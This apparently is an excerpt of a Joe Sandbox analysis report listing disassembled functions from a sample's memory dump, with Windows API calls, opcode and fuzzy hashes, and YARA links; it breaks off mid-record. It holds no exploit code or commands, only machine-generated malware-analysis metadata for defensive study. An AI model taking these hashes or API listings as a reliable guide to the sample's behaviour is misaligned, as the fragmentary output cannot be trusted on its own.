                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                            • String ID:
                            • API String ID: 1378193009-0
                            • Opcode ID: 5b83b62c2e14977a40457bc652bf319ce21be5f43b13b402856ff5d16a6634f9
                            • Instruction ID: 9dc0b19f12ad459d48611298cb60136469b923021db10a9b9a4ae10e0a930029
                            • Opcode Fuzzy Hash: 5b83b62c2e14977a40457bc652bf319ce21be5f43b13b402856ff5d16a6634f9
                            • Instruction Fuzzy Hash: C92107705047849FEB328B24D855BE7BBFDAF01318F08449DE6CE96281D37469C4CB61
                            Function 00DB6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            • gethostbyname.WSOCK32(?,?,?), ref: 00DB6399
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB63A4
                            • _memmove.LIBCMT ref: 00DB63D1
                            • inet_ntoa.WSOCK32(?), ref: 00DB63DC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: eae2456c0201ca6b64c877b5ea1d0ccdb136244a7b3984ff6b9f92f5ded7814a
                            • Instruction ID: 2248907b791fda01d03d08907f2310e1af3d408f6acb4da4f5452124b16f06c2
                            • Opcode Fuzzy Hash: eae2456c0201ca6b64c877b5ea1d0ccdb136244a7b3984ff6b9f92f5ded7814a
                            • Instruction Fuzzy Hash: BC11497650010AAFCB00EBA4D996CEEBBB9EF08310B144165F506A7262DB31EE14DB71
                            Function 00D98B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D98B61
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98B73
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98B89
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D98BA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
                            • Instruction ID: 852432c5282208af8be47eca7a389da9e24ab51e2ea63076e23bee2f3dd684d3
                            • Opcode Fuzzy Hash: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
                            • Instruction Fuzzy Hash: 0F113A79900218BFDF10DB95C884E9DBBB4EB48710F244095E900B7250DA716E10EBA4
                            Function 00D41290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8
                            • GetClientRect.USER32(?,?,?,?,?), ref: 00D7B5FB
                            • GetCursorPos.USER32(?), ref: 00D7B605
                            • ScreenToClient.USER32(?,?), ref: 00D7B610
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Client$CursorLongProcRectScreenWindow
                            • String ID:
                            • API String ID: 4127811313-0
                            • Opcode ID: f51cc58d441b01823d9d1cf582a8f0f02a739d2fc8dffc1f3ad12cc8ad471838
                            • Instruction ID: a476ab7ab8c8811fc9f5f12002786d91eb7a03d9e94bf932ca821e00f562a0ff
                            • Opcode Fuzzy Hash: f51cc58d441b01823d9d1cf582a8f0f02a739d2fc8dffc1f3ad12cc8ad471838
                            • Instruction Fuzzy Hash: FB11283960011AAFCB00DF98D88ADFE77B9FB05300F404456FA41E7240D770AA918BB9
                            Function 00DA1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA115F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA1184
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA118E
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00D9FCED,?,00DA0D40,?,00008000), ref: 00DA11C1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: 3c237dbf3b37a18977ee742853fec43a711d0cc7b20f022d747cb1bca7cf7f27
                            • Instruction ID: c1c3e8662a753e562437f59e37f8d5a422a64b342d5faa18c978faba39af8765
                            • Opcode Fuzzy Hash: 3c237dbf3b37a18977ee742853fec43a711d0cc7b20f022d747cb1bca7cf7f27
                            • Instruction Fuzzy Hash: C4113C39D0071EDBCF009FA5D848AEEBBB8FF1A711F054056EA85B2240CB709550CBB5
                            Function 00D9D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D9D84D
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D9D864
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D9D879
                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D9D897
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Type$Register$FileLoadModuleNameUser
                            • String ID:
                            • API String ID: 1352324309-0
                            • Opcode ID: d213675190ac33364247ba28972663238871ca6049081c9234e8d7c79e6bfcb1
                            • Instruction ID: 8e7b51579ee5faa8c7ac8f7ecd913107c8ad1292e396d1e5d001f2741fc46344
                            • Opcode Fuzzy Hash: d213675190ac33364247ba28972663238871ca6049081c9234e8d7c79e6bfcb1
                            • Instruction Fuzzy Hash: 74116175605305EBEB209FA0DC09F93BBBDEB00B00F10856AA556D6151D7B0E549DBB1
                            Function 00D76FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: f33b509e0902d6e26b67e77777d37e7f37ec8a3e17ba37f0d0a43fab5f124556
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 0B014B7244814ABBCF265F84CC01CEE3F72FB18351B588825FA5C59031E236D9B1ABA1
                            Function 00DCB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00DCB2E4
                            • ScreenToClient.USER32(?,?), ref: 00DCB2FC
                            • ScreenToClient.USER32(?,?), ref: 00DCB320
                            • InvalidateRect.USER32(?,?,?), ref: 00DCB33B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
                            • Instruction ID: b7b37bc7a3f06ac1e2f8ae286476babebba0806d6b0c0dce907189e17881b96d
                            • Opcode Fuzzy Hash: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
                            • Instruction Fuzzy Hash: C1114675D4024AEFDB41CF99C444AEEBBB5FB08310F104166E954E3320D735AA559F60
                            Function 00DA6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 00DA6BE6
                              • Part of subcall function 00DA76C4: _memset.LIBCMT ref: 00DA76F9
                            • _memmove.LIBCMT ref: 00DA6C09
                            • _memset.LIBCMT ref: 00DA6C16
                            • LeaveCriticalSection.KERNEL32(?), ref: 00DA6C26
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: 74c89344c1faa1661293f26e79ddd37955000aee46e6874da3e1e6b98a4198ec
                            • Instruction ID: afe964941ac6b97398121b892e8610494a1ef2deb5dd8f4d4c0bcd586524f710
                            • Opcode Fuzzy Hash: 74c89344c1faa1661293f26e79ddd37955000aee46e6874da3e1e6b98a4198ec
                            • Instruction Fuzzy Hash: 19F0F47A100210ABCF416F95DC85E8ABF2AEF45361F048065FE089E267D735E911DBB4
                            Function 00D42218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000008,00000000), ref: 00D42231
                            • SetTextColor.GDI32(?,000000FF), ref: 00D4223B
                            • SetBkMode.GDI32(?,00000001), ref: 00D42250
                            • GetStockObject.GDI32(00000005), ref: 00D42258
                            • GetWindowDC.USER32(?), ref: 00D7BE83
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D7BE90
                            • GetPixel.GDI32(00000000,?,00000000), ref: 00D7BEA9
                            • GetPixel.GDI32(00000000,00000000,?), ref: 00D7BEC2
                            • GetPixel.GDI32(00000000,?,?), ref: 00D7BEE2
                            • ReleaseDC.USER32(?,00000000), ref: 00D7BEED
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: cc9e1b5e9e6f6a39cbc877a09ff8161708d9f81c600ef7d1c21417833045695a
                            • Instruction ID: a0c3eb99d9059c59b50d90909c0578791303b3d7c59357b9eaef7e5aa1f81f51
                            • Opcode Fuzzy Hash: cc9e1b5e9e6f6a39cbc877a09ff8161708d9f81c600ef7d1c21417833045695a
                            • Instruction Fuzzy Hash: 3DE03932104346AADB215F64EC4DBD83B12EB05332F188366FAA9881E197B24980DB32
                            Function 00D98712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00D98195,?,?,?,00D982E6), ref: 00D9871B
                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D982E6), ref: 00D98722
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D982E6), ref: 00D9872F
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D982E6), ref: 00D98736
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
                            • Instruction ID: b6c3b4b238b2d716cebad5c4b170c39226c29ad46810f93afe5080cb88538407
                            • Opcode Fuzzy Hash: 9531a18a15b26f8c58ad025682468e9bf24de18c6433176f2aafefd99883e554
                            • Instruction Fuzzy Hash: 7AE08676611313ABDB205FF05D0CFD67BAEEF51B91F144828F645CA040DA348445D770
                            Function 00DBAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __itow_s
                            • String ID: xb$xb
                            • API String ID: 3653519197-3775679291
                            • Opcode ID: 56b2526e5c068124aa46b9a1a1dd4abd57234eddd838c174ec9b40c2296ada99
                            • Instruction ID: cf82e54c003c05e5e2b32a51f2db11f1cbeedc6062dc727cd1bff4819bae29db
                            • Opcode Fuzzy Hash: 56b2526e5c068124aa46b9a1a1dd4abd57234eddd838c174ec9b40c2296ada99
                            • Instruction Fuzzy Hash: C6B15D70A00209EFCB14DF59C891EFABBB9EF59350F14805AF9469B291EB71D981CB70
                            Function 00D9B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                            Download Yara Rule
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 00D9B4BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 3565006973-3941886329
                            • Opcode ID: 36bf185e4723873b583cc55b648032c766cae047e072c8d73e6ac1bf5ddd06bc
                            • Instruction ID: 78a7ee06f6238a1d06bffbb57a138b2080afcf0ef620db6e7561810da9b0f5d0
                            • Opcode Fuzzy Hash: 36bf185e4723873b583cc55b648032c766cae047e072c8d73e6ac1bf5ddd06bc
                            • Instruction Fuzzy Hash: 34916870200601EFDB54CF64D984AAABBE5FF48720F25856EF94ACB391DB70E841CB60
                            Function 00DAAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • __wcsnicmp.LIBCMT ref: 00DAB02D
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DAB0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 6ee41dc0c3ec3ce0f1ab9bd3f71b5d6436ba520830d7894d398325ab8c5269c5
                            • Instruction ID: a84a09f2c0e2c7506565d52890782a0bb667d95ea195e02d0b4c6bcd8624af9a
                            • Opcode Fuzzy Hash: 6ee41dc0c3ec3ce0f1ab9bd3f71b5d6436ba520830d7894d398325ab8c5269c5
                            • Instruction Fuzzy Hash: 2861A571A00215AFCB14DF98C8A1EAEB7B4EF09320F04406AF956AB352D770EE45CB74
                            Function 00D52957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00D52968
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D52981
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: e35dc43122605f462b5c08a9123b42d317baa826d500f93136d5dd7a9d665538
                            • Instruction ID: d1dd7771f4100c122461e5a3446a5be210f25ec1fed357052e152501195aae37
                            • Opcode Fuzzy Hash: e35dc43122605f462b5c08a9123b42d317baa826d500f93136d5dd7a9d665538
                            • Instruction Fuzzy Hash: D45146724087449BD320EF15DC86BAFBBE8FB85344F42885DF6D8811A1DB318529CB76
                            Function 00DA9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44F0B: __fread_nolock.LIBCMT ref: 00D44F29
                            • _wcscmp.LIBCMT ref: 00DA9824
                            • _wcscmp.LIBCMT ref: 00DA9837
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: 1c7fb6be663a3d0372778a0b49756d12c444c8b9849104885aa283883ffdc476
                            • Instruction ID: e8e547bcc062906c539358c2aa670b968908a93d9fb16e93bf360c55d81d71f6
                            • Opcode Fuzzy Hash: 1c7fb6be663a3d0372778a0b49756d12c444c8b9849104885aa283883ffdc476
                            • Instruction Fuzzy Hash: C041A471A0021ABBDF219EA4CC55FEFBBBDDF86710F004469F904A7181DA75AA488B71
                            Function 00D80574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID: Dd$Dd
                            • API String ID: 1473721057-2413357308
                            • Opcode ID: 0f70ad2cefc19ac77ef1777cd954f0afa8b41b6c2452c24ee17be66e709e7d95
                            • Instruction ID: 69b1219d61c6f1d27720e5044dbbf2d56f873996885dca1016a4dce879c292a5
                            • Opcode Fuzzy Hash: 0f70ad2cefc19ac77ef1777cd954f0afa8b41b6c2452c24ee17be66e709e7d95
                            • Instruction Fuzzy Hash: CA51E0786493428FD754CF19C480A1ABBF2FB99354F58885DE9858B361E332E885CF62
                            Function 00DB258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB259E
                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DB25D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
